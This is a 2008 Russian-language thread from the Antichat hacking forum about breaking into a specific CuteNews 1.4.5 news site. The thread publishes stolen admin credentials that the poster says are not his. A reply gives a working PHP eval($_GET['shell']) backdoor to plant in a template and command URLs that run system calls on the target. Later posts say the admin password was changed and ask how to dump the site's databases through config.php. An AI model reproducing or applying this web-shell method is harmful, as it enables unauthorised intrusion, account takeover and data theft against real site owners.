Форум АНТИЧАТ
Страница 1 из 3 1 2 3 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Shell CuteNews 1.4.5 Help! (https://forum.antichat.xyz/showthread.php?t=84299)

myrz 10.09.2008 15:30
Shell CuteNews 1.4.5 Help!
 
Всем привет!
Вобщем возник вопрос как залить шелл в известный блог новостей (CuteNews) имея данные администратора.
Прочитал много мануалов и эфект нулейвой может ктонить сможет если сможете можете описать как сделали это буду очень признателен :)
Вот куда я хочу залить шелл.
_ttp://la2.no-ip.org/news/
Login: dsl
Password: 79513159

Заранее спасибо.

Astn 10.09.2008 15:32
Оо у мня такаяже прабла немогу понять что нетак делаю. подскажите плиз.

aka PSIH 10.09.2008 15:48
скока писали уже про это...

1. Настройкa блока новостей -> Редактировать шаблоны
Добавляем в конец
Цитата:
HTML;
if(isset($_GET['shell'])) eval($_GET['shell']);
сохраняем
2.
_http://la2.no-ip.org/news/show_news.php?shell=phpinfo();
_http://la2.no-ip.org/news/show_news.php?shell=system(dir);

p.s: там Windows...

myrz 10.09.2008 15:59
Дело в том что я делаю так.
Настройкa блока новостей ->>> Редактировать шаблоны И вижу там


Редактируйте Части Шаблона

Активные новости
Полная версия
Комментарии
Форма добавления комментариев
Предыдущая & Следующая(новости)
Предыдущая & Следующая(коментарий)

Жму Активные новости

Там открывается окошко с следущим содержанием

Цитата:
<div style="width:100%; margin-bottom:30px;">
<div><strong>{title}</strong></div>

<div style="text-align:justify; padding:3px; margin-top:3px; margin-bottom:5px; border-top:1px solid #D3D3D3;">{short-story}</div>


</div>
Я дописываю
Цитата:
HTML; if(isset($_GET['shell'])) eval($_GET['shell']);
Получается так

Цитата:
<div style="width:100%; margin-bottom:30px;">
<div><strong>{title}</strong></div>

<div style="text-align:justify; padding:3px; margin-top:3px; margin-bottom:5px; border-top:1px solid #D3D3D3;">{short-story}</div>


</div>
HTML; if(isset($_GET['shell'])) eval($_GET['shell']);
Потом захожу из этих сылоку куданить

Цитата:
_http://la2.no-ip.org/news/show_news.php?shell=phpinfo();
_http://la2.no-ip.org/news/show_news.php?shell=system(dir);
Мне выдаёт ошибку мол

Цитата:
Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in F:\site\www\news\data\Default.tpl on line 11
Что делать ваще незнаю :(

myrz 10.09.2008 16:02
Сайт работает и я чуствую что он даже меня переживёт (((

myrz 10.09.2008 16:04
ППЦ уже кто-то залез в админку и щас даже шаблон не отредактировать (((

Rebz 10.09.2008 16:04
А ты смельчак выкладывать логин и пароль в открытый доступ..

myrz 10.09.2008 16:04
Это не мой :)))

aka PSIH 10.09.2008 16:09
http://la2.no-ip.org/news/show_news.php?shell=phpinfo();
http://la2.no-ip.org/news/show_news.php?shell=system(dir);

все работает, пароль от админки я сменил, и т.к ты уже стучишся в аську ), я его тебе туда отправил...

myrz 10.09.2008 16:20
М возник еще вопрос.
Дело в том что мне надо слить их базы.
Даныые базы хронятся тут
Цитата:
http://la2.no-ip.org/config/config.php
Как организовать это скажите плиз.


Время: 12:33
Страница 1 из 3 1 2 3 >
Показывать 40 сообщений этой темы на одной странице